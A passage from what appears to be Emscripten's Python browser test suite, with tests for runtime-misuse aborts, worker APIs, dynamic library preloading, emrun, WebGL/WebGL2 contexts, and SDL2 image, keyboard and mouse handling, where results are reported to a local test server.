function doCwrapCall(n) {
var str = wrapped(n);
out('got ' + str);
assert(str === 'silly-string');
}
function doDirectCall(n) {
Module['_note'](n);
}
'''
post_test = '''
var ok = false;
try {
doCcall(1);
ok = true; // should fail and not reach here, runtime is not ready yet so ccall will abort
} catch(e) {
out('expected fail 1');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doCwrapCall(2);
ok = true; // should fail and not reach here, runtime is not ready yet so cwrap call will abort
} catch(e) {
out('expected fail 2');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doDirectCall(3);
ok = true; // should fail and not reach here, runtime is not ready yet so any code execution will abort
} catch(e) {
out('expected fail 3');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
'''
post_hook = r'''
function myJSCallback() {
// Run on the next event loop, as code may run in a postRun right after main().
setTimeout(function() {
var xhr = new XMLHttpRequest();
assert(Module.noted);
xhr.open('GET', 'http://localhost:%s/report_result?' + HEAP32[Module.noted>>2]);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}, 0);
// called from main, this is an ok time
doCcall(100);
doCwrapCall(200);
doDirectCall(300);
}
''' % self.port
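# Rough structure of the pieces above: post_prep defines the three call paths (ccall,
# cwrap, direct), post_test exercises them while the runtime is not ready (each should
# abort unless expected_ok is set), and post_hook performs the same calls at a valid time
# and reports the accumulated result (presumably 100+200+300=600).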
create_test_file('pre_runtime.js', r'''
Module.onRuntimeInitialized = function(){
myJSCallback();
};
''')
for filename, extra_args, second_code in [
('runtime_misuse.cpp', [], 600),
('runtime_misuse_2.cpp', ['--pre-js', 'pre_runtime.js'], 601) # 601, because no main means we *do* run another call after exit()
]:
for mode in [['-s', 'WASM=0'], ['-s', 'WASM=1']]:
if 'WASM=0' in mode and self.is_wasm_backend():
continue
print('\n', filename, extra_args, mode)
print('mem init, so async, call too early')
create_test_file('post.js', post_prep + post_test + post_hook)
self.btest(filename, expected='600', args=['--post-js', 'post.js', '--memory-init-file', '1', '-s', 'EXIT_RUNTIME=1'] + extra_args + mode)
print('sync startup, call too late')
create_test_file('post.js', post_prep + 'Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected=str(second_code), args=['--post-js', 'post.js', '--memory-init-file', '0', '-s', 'EXIT_RUNTIME=1'] + extra_args + mode)
print('sync, runtime still alive, so all good')
create_test_file('post.js', post_prep + 'expected_ok = true; Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected='606', args=['--post-js', 'post.js', '--memory-init-file', '0'] + extra_args + mode)
def test_cwrap_early(self):
self.btest(os.path.join('browser', 'cwrap_early.cpp'), args=['-O2', '-s', 'ASSERTIONS=1', '--pre-js', path_from_root('tests', 'browser', 'cwrap_early.js'), '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["cwrap"]'], expected='0')
def test_worker_api(self):
self.compile_btest([path_from_root('tests', 'worker_api_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]'])
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_2(self):
self.compile_btest([path_from_root('tests', 'worker_api_2_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-O2', '--minify', '0', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two", "_three", "_four"]', '--closure', '1'])
self.btest('worker_api_2_main.cpp', args=['-O2', '--minify', '0'], expected='11')
def test_worker_api_3(self):
self.compile_btest([path_from_root('tests', 'worker_api_3_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]'])
self.btest('worker_api_3_main.cpp', expected='5')
def test_worker_api_sleep(self):
self.compile_btest([path_from_root('tests', 'worker_api_worker_sleep.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]'] + self.get_async_args())
self.btest('worker_api_main.cpp', expected='566')
def test_emscripten_async_wget2(self):
self.btest('http.cpp', expected='0', args=['-I' + path_from_root('tests')])
# TODO: this test only worked in non-fastcomp
@unittest.skip('non-fastcomp is deprecated and fails in 3.5')
def test_module(self):
self.compile_btest([path_from_root('tests', 'browser_module.cpp'), '-o', 'module.js', '-O2', '-s', 'SIDE_MODULE=1', '-s', 'DLOPEN_SUPPORT=1', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two"]'])
self.btest('browser_main.cpp', args=['-O2', '-s', 'MAIN_MODULE=1', '-s', 'DLOPEN_SUPPORT=1', '-s', 'EXPORT_ALL=1'], expected='8')
def test_preload_module(self):
create_test_file('library.c', r'''
#include <stdio.h>
int library_func() {
return 42;
}
''')
self.compile_btest(['library.c', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'library.wasm', '-s', 'WASM=1', '-s', 'EXPORT_ALL=1'])
os.rename('library.wasm', 'library.so')
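# With --use-preload-plugins, a preloaded .so/.wasm file should be compiled ahead of
# time and cached in Module['preloadedWasm'], which is what the EM_ASM check below
# looks for before dlopen()ing the library synchronously.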
main = r'''
#include <dlfcn.h>
#include <stdio.h>
#include <emscripten.h>
int main() {
int found = EM_ASM_INT(
return Module['preloadedWasm']['/library.so'] !== undefined;
);
if (!found) {
REPORT_RESULT(1);
return 1;
}
void *lib_handle = dlopen("/library.so", 0);
if (!lib_handle) {
REPORT_RESULT(2);
return 2;
}
typedef int (*voidfunc)();
voidfunc x = (voidfunc)dlsym(lib_handle, "library_func");
if (!x || x() != 42) {
REPORT_RESULT(3);
return 3;
}
REPORT_RESULT(0);
return 0;
}
'''
self.btest(
main,
args=['-s', 'MAIN_MODULE=1', '--preload-file', '.@/', '-O2', '-s', 'WASM=1', '--use-preload-plugins', '-s', 'EXPORT_ALL=1'],
expected='0')
def test_mmap_file(self):
create_test_file('data.dat', 'data from the file ' + ('.' * 9000))
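# --no-heap-copy should make the file packager keep the preloaded data outside the heap
# instead of copying it in; the test runs both ways to check that mmap works either way.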
for extra_args in [[], ['--no-heap-copy']]:
self.btest(path_from_root('tests', 'mmap_file.c'), expected='1', args=['--preload-file', 'data.dat'] + extra_args)
def test_emrun_info(self):
if not has_browser():
self.skipTest('need a browser')
result = run_process([PYTHON, path_from_root('emrun'), '--system_info', '--browser_info'], stdout=PIPE).stdout
assert 'CPU' in result
assert 'Browser' in result
assert 'Traceback' not in result
result = run_process([PYTHON, path_from_root('emrun'), '--list_browsers'], stdout=PIPE).stdout
assert 'Traceback' not in result
# Deliberately named as test_zzz_emrun to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_emrun(self):
self.compile_btest([path_from_root('tests', 'test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
outdir = os.getcwd()
if not has_browser():
self.skipTest('need a browser')
# We cannot run emrun from the temp directory that the suite cleans up afterwards: the
# launched browser uses it as its startup directory and does not close as part of the
# test, which pins down the cwd on Windows and makes it impossible to delete. Therefore
# switch away from that directory before launching.
os.chdir(path_from_root())
args_base = [PYTHON, path_from_root('emrun'), '--timeout', '30', '--safe_firefox_profile', '--port', '6939', '--verbose', '--log_stdout', os.path.join(outdir, 'stdout.txt'), '--log_stderr', os.path.join(outdir, 'stderr.txt')]
if EMTEST_BROWSER is not None:
# If EMTEST_BROWSER carries command line arguments to pass to the browser
# (e.g. "firefox -profile /path/to/foo"), those can't be passed via emrun,
# so strip them out.
browser_cmd = shlex.split(EMTEST_BROWSER)
browser_path = browser_cmd[0]
args_base += ['--browser', browser_path]
if len(browser_cmd) > 1:
browser_args = browser_cmd[1:]
if 'firefox' in browser_path and '-profile' in browser_args:
# emrun uses its own -profile, strip it out
parser = argparse.ArgumentParser(add_help=False) # otherwise it throws with -headless
parser.add_argument('-profile')
browser_args = parser.parse_known_args(browser_args)[1]
if browser_args:
args_base += ['--browser_args', ' ' + ' '.join(browser_args)]
for args in [
args_base,
args_base + ['--no_private_browsing', '--port', '6941']
]:
args += [os.path.join(outdir, 'hello_world.html'), '1', '2', '--3']
proc = run_process(args, check=False)
stdout = open(os.path.join(outdir, 'stdout.txt'), 'r').read()
stderr = open(os.path.join(outdir, 'stderr.txt'), 'r').read()
assert proc.returncode == 100
assert 'argc: 4' in stdout
assert 'argv[3]: --3' in stdout
assert 'hello, world!' in stdout
assert 'Testing ASCII characters: !"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~' in stdout
assert 'Testing char sequences: %20%21 ä' in stdout
assert 'hello, error stream!' in stderr
# This does not actually verify anything except that --cpuprofiler and --memoryprofiler compile.
# Run interactive.test_cpuprofiler_memoryprofiler for interactive testing.
@requires_graphics_hardware
def test_cpuprofiler_memoryprofiler(self):
self.btest('hello_world_gles.c', expected='0', args=['-DLONGTEST=1', '-DTEST_MEMORYPROFILER_ALLOCATIONS_MAP=1', '-O2', '--cpuprofiler', '--memoryprofiler', '-lGL', '-lglut', '-DANIMATE'])
def test_uuid(self):
# Run with ./runner.py browser.test_uuid
# We run this test in Node/SPIDERMONKEY and browser environments because we try to make use of
# high quality crypto random number generators such as crypto.getRandomValues or randomBytes (if available).
# First run tests in Node and/or SPIDERMONKEY using run_js. Use closure compiler so we can check that
# require('crypto').randomBytes and window.crypto.getRandomValues don't get minified out.
self.compile_btest(['-O2', '--closure', '1', path_from_root('tests', 'uuid', 'test.c'), '-o', 'test.js', '-luuid'])
test_js_closure = open('test.js').read()
# Check that test.js compiled with --closure 1 contains ").randomBytes" and "window.crypto.getRandomValues"
assert ").randomBytes" in test_js_closure
assert "window.crypto.getRandomValues" in test_js_closure
out = run_js('test.js', full_output=True)
print(out)
# Tidy up files that might have been created by this test.
try_delete(path_from_root('tests', 'uuid', 'test.js'))
try_delete(path_from_root('tests', 'uuid', 'test.js.map'))
# Now run test in browser
self.btest(path_from_root('tests', 'uuid', 'test.c'), '1', args=['-luuid'])
@requires_graphics_hardware
def test_glew(self):
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION=1'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-DGLEW_MX'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION=1', '-DGLEW_MX'], expected='1')
def test_doublestart_bug(self):
create_test_file('pre.js', r'''
if (!Module['preRun']) Module['preRun'] = [];
Module["preRun"].push(function () {
addRunDependency('test_run_dependency');
removeRunDependency('test_run_dependency');
});
''')
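# Adding and immediately removing a run dependency in preRun has historically been able
# to trigger run() twice; the native side presumably counts how many times main() ran
# and reports it (expected to be exactly 1).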
self.btest('doublestart.c', args=['--pre-js', 'pre.js', '-o', 'test.html'], expected='1')
@requires_threads
def test_html5(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
print(opts)
self.btest(path_from_root('tests', 'test_html5.c'), args=['-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1'] + opts, expected='0')
@requires_threads
def test_html5_gamepad(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
print(opts)
self.btest(path_from_root('tests', 'test_gamepad.c'), args=['-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1'] + opts, expected='0')
@requires_graphics_hardware
def test_html5_webgl_create_context_no_antialias(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts + ['-DNO_ANTIALIAS', '-lGL'], expected='0')
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_threads
@requires_graphics_hardware
def test_html5_webgl_create_context(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1'], ['-s', 'USE_PTHREADS=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts + ['-lGL'], expected='0')
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
def test_html5_webgl_create_context2(self):
self.btest(path_from_root('tests', 'webgl_create_context2.cpp'), args=['--shell-file', path_from_root('tests', 'webgl_create_context2_shell.html'), '-lGL'], expected='0')
@requires_graphics_hardware
def test_html5_webgl_destroy_context(self):
for opts in [[], ['-O2', '-g1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_destroy_context.cpp'), args=opts + ['-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1', '--shell-file', path_from_root('tests/webgl_destroy_context_shell.html'), '-lGL'], expected='0')
@no_chrome('see #7373')
@requires_graphics_hardware
def test_webgl_context_params(self):
if WINDOWS:
self.skipTest('SKIPPED due to bug https://bugzilla.mozilla.org/show_bug.cgi?id=1310005 - WebGL implementation advertises implementation defined GL_IMPLEMENTATION_COLOR_READ_TYPE/FORMAT pair that it cannot read with')
self.btest(path_from_root('tests', 'webgl_color_buffer_readpixels.cpp'), args=['-lGL'], expected='0')
# Test for PR#5373 (https://github.com/emscripten-core/emscripten/pull/5373)
def test_webgl_shader_source_length(self):
for opts in [[], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_shader_source_length.cpp'), args=opts + ['-lGL'], expected='0')
def test_webgl2(self):
for opts in [
[],
['-O2', '-g1', '--closure', '1', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1'],
['-s', 'FULL_ES2=1'],
]:
print(opts)
self.btest(path_from_root('tests', 'webgl2.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'] + opts, expected='0')
@requires_graphics_hardware
@requires_threads
def test_webgl2_pthreads(self):
# test that a program can be compiled with pthreads and render WebGL2 properly on the main thread
# (the testcase doesn't even use threads, but is compiled with thread support).
self.btest(path_from_root('tests', 'webgl2.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL', '-s', 'USE_PTHREADS=1'], expected='0')
def test_webgl2_objects(self):
self.btest(path_from_root('tests', 'webgl2_objects.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'], expected='0')
def test_webgl2_ubos(self):
self.btest(path_from_root('tests', 'webgl2_ubos.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'], expected='0')
@requires_graphics_hardware
def test_webgl2_garbage_free_entrypoints(self):
self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), args=['-s', 'USE_WEBGL2=1', '-DTEST_WEBGL2=1'], expected='1')
self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), expected='1')
@requires_graphics_hardware
def test_webgl2_backwards_compatibility_emulation(self):
self.btest(path_from_root('tests', 'webgl2_backwards_compatibility_emulation.cpp'), args=['-s', 'USE_WEBGL2=1', '-s', 'WEBGL2_BACKWARDS_COMPATIBILITY_EMULATION=1'], expected='0')
@requires_graphics_hardware
def test_webgl_with_closure(self):
self.btest(path_from_root('tests', 'webgl_with_closure.cpp'), args=['-O2', '-s', 'USE_WEBGL2=1', '--closure', '1', '-lGL'], expected='0')
# Tests that -s GL_ASSERTIONS=1 and glVertexAttribPointer with packed types works
@requires_graphics_hardware
def test_webgl2_packed_types(self):
self.btest(path_from_root('tests', 'webgl2_draw_packed_triangle.c'), args=['-lGL', '-s', 'USE_WEBGL2=1', '-s', 'GL_ASSERTIONS=1'], expected='0')
@requires_graphics_hardware
def test_webgl2_pbo(self):
self.btest(path_from_root('tests', 'webgl2_pbo.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'], expected='0')
def test_sdl_touch(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'sdl_touch.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_html5_mouse(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_html5_mouse.c'), args=opts + ['-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1', '-DAUTOMATE_SUCCESS=1'], expected='0')
def test_sdl_mousewheel(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_sdl_mousewheel.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
@no_wasm_backend('asm.js-specific')
def test_codemods(self):
# tests asm.js client-side code modifications
for opt_level in [0, 2]:
print('opt level', opt_level)
opts = ['-O' + str(opt_level), '-s', 'WASM=0']
# sanity checks, building with and without precise float semantics generates different results
self.btest(path_from_root('tests', 'codemods.cpp'), expected='2', args=opts)
self.btest(path_from_root('tests', 'codemods.cpp'), expected='1', args=opts + ['-s', 'PRECISE_F32=1'])
self.btest(path_from_root('tests', 'codemods.cpp'), expected='1', args=opts + ['-s', 'PRECISE_F32=2', '--separate-asm']) # empty polyfill, but browser has support, so semantics are like float
def test_wget(self):
create_test_file('test.txt', 'emscripten')
self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=self.get_async_args())
def test_wget_data(self):
create_test_file('test.txt', 'emscripten')
self.btest(path_from_root('tests', 'test_wget_data.c'), expected='1', args=['-O2', '-g2'] + self.get_async_args())
# in the emterpreter, check the special assertions mode as well
if not self.is_wasm_backend():
self.btest(path_from_root('tests', 'test_wget_data.c'), expected='1', args=['-O2', '-g2', '-s', 'ASSERTIONS=1'] + self.get_async_args())
def test_locate_file(self):
for wasm in ([0, 1] if not self.is_wasm_backend() else [1]):
print('wasm', wasm)
self.clear()
create_test_file('src.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
FILE *f = fopen("data.txt", "r");
assert(f && "could not open file");
char buf[100];
int num = fread(buf, 1, 20, f);
assert(num == 20 && "could not read 20 bytes");
buf[20] = 0;
fclose(f);
int result = !strcmp("load me right before", buf);
printf("|%s| : %d\n", buf, result);
REPORT_RESULT(result);
return 0;
}
'''))
create_test_file('data.txt', 'load me right before...')
create_test_file('pre.js', 'Module.locateFile = function(x) { return "sub/" + x };')
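# Module.locateFile(path) lets the page redirect runtime file requests (the .data
# package, the .mem file or the .wasm binary) to another location; here the generated
# files are moved into sub/, so the test only passes if locateFile is actually consulted.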
run_process([PYTHON, FILE_PACKAGER, 'test.data', '--preload', 'data.txt'], stdout=open('data.js', 'w'))
# put pre.js first, then the file packager data, so locateFile is there for the file loading code
self.compile_btest(['src.cpp', '-O2', '-g', '--pre-js', 'pre.js', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1', '-s', 'WASM=' + str(wasm)])
os.mkdir('sub')
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
shutil.move('test.data', os.path.join('sub', 'test.data'))
self.run_browser('page.html', None, '/report_result?1')
# alternatively, put locateFile in the HTML
print('in html')
create_test_file('shell.html', '''
<body>
<script>
var Module = {
locateFile: function(x) { return "sub/" + x }
};
</script>
{{{ SCRIPT }}}
</body>
''')
def in_html(expected, args=[]):
self.compile_btest(['src.cpp', '-O2', '-g', '--shell-file', 'shell.html', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'SAFE_HEAP=1', '-s', 'ASSERTIONS=1', '-s', 'FORCE_FILESYSTEM=1', '-s', 'WASM=' + str(wasm)] + args)
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
self.run_browser('page.html', None, '/report_result?' + expected)
in_html('1')
# verify that the mem init request succeeded in the latter case
if not wasm:
create_test_file('src.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
int result = EM_ASM_INT({
return Module['memoryInitializerRequest'].status;
});
printf("memory init request: %d\n", result);
REPORT_RESULT(result);
return 0;
}
'''))
in_html('200')
@requires_graphics_hardware
def test_glfw3(self):
for opts in [[], ['-s', 'LEGACY_GL_EMULATION=1'], ['-Os', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'glfw3.c'), args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'] + opts, expected='1')
@requires_graphics_hardware
def test_glfw_events(self):
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=2', "-DUSE_GLFW=2", '-lglfw', '-lGL'], expected='1')
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=3', "-DUSE_GLFW=3", '-lglfw', '-lGL'], expected='1')
@no_wasm_backend('asm.js')
def test_asm_swapping(self):
self.clear()
create_test_file('run.js', r'''
Module['onRuntimeInitialized'] = function() {
// test proper initial result
var result = Module._func();
console.log('first: ' + result);
if (result !== 10) throw 'bad first result';
// load second module to be swapped in
var second = document.createElement('script');
second.onload = function() { console.log('loaded second') };
second.src = 'second.js';
document.body.appendChild(second);
console.log('second appended');
Module['onAsmSwap'] = function() {
console.log('swapped');
// verify swapped-in result
var result = Module._func();
console.log('second: ' + result);
if (result !== 22) throw 'bad second result';
Module._report(999);
console.log('reported');
};
};
''')
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2']]:
print(opts)
opts += ['-s', 'WASM=0', '--pre-js', 'run.js', '-s', 'SWAPPABLE_ASM_MODULE=1'] # important that both modules are built with the same opts
create_test_file('second.cpp', self.with_report_result(open(path_from_root('tests', 'asm_swap2.cpp')).read()))
self.compile_btest(['second.cpp'] + opts)
run_process([PYTHON, path_from_root('tools', 'distill_asm.py'), 'a.out.js', 'second.js', 'swap-in'])
self.assertExists('second.js')
if SPIDERMONKEY_ENGINE in JS_ENGINES:
out = run_js('second.js', engine=SPIDERMONKEY_ENGINE, stderr=PIPE, full_output=True, assert_returncode=None)
self.validate_asmjs(out)
else:
print('Skipping asm validation check, spidermonkey is not configured')
self.btest(path_from_root('tests', 'asm_swap.cpp'), args=opts, expected='999')
@requires_graphics_hardware
def test_sdl2_image(self):
# load an image file and get pixel data. Also gives O2 coverage for --preload-file and the memory init file.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
create_test_file('sdl2_image.c', self.with_report_result(open(path_from_root('tests', 'sdl2_image.c')).read()))
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
'sdl2_image.c', '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpeg')
create_test_file('sdl2_image_jpeg.c', self.with_report_result(open(path_from_root('tests', 'sdl2_image.c')).read()))
self.compile_btest([
'sdl2_image_jpeg.c', '-o', 'page.html',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_formats(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl2_image.c', expected='512', args=['--preload-file', 'screenshot.png', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.png"',
'-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["png"]'])
self.btest('sdl2_image.c', expected='600', args=['--preload-file', 'screenshot.jpg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpg"',
'-DBITSPERPIXEL=24', '-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["jpg"]'])
def test_sdl2_key(self):
for defines in [[]]:
create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
var prevented = !document.dispatchEvent(event);
// send keypress if not prevented
if (!prevented) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
create_test_file('sdl2_key.c', self.with_report_result(open(path_from_root('tests', 'sdl2_key.c')).read()))
self.compile_btest(['sdl2_key.c', '-o', 'page.html'] + defines + ['-s', 'USE_SDL=2', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']'''])
self.run_browser('page.html', '', '/report_result?37182145')
def test_sdl2_text(self):
create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
create_test_file('sdl2_text.c', self.with_report_result(open(path_from_root('tests', 'sdl2_text.c')).read()))
self.compile_btest(['sdl2_text.c', '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('sdl2_mouse.c', self.with_report_result(open(path_from_root('tests', 'sdl2_mouse.c')).read()))
self.compile_btest(['sdl2_mouse.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse_offsets(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl2_mouse.js"></script>
</body>
</html>
''')
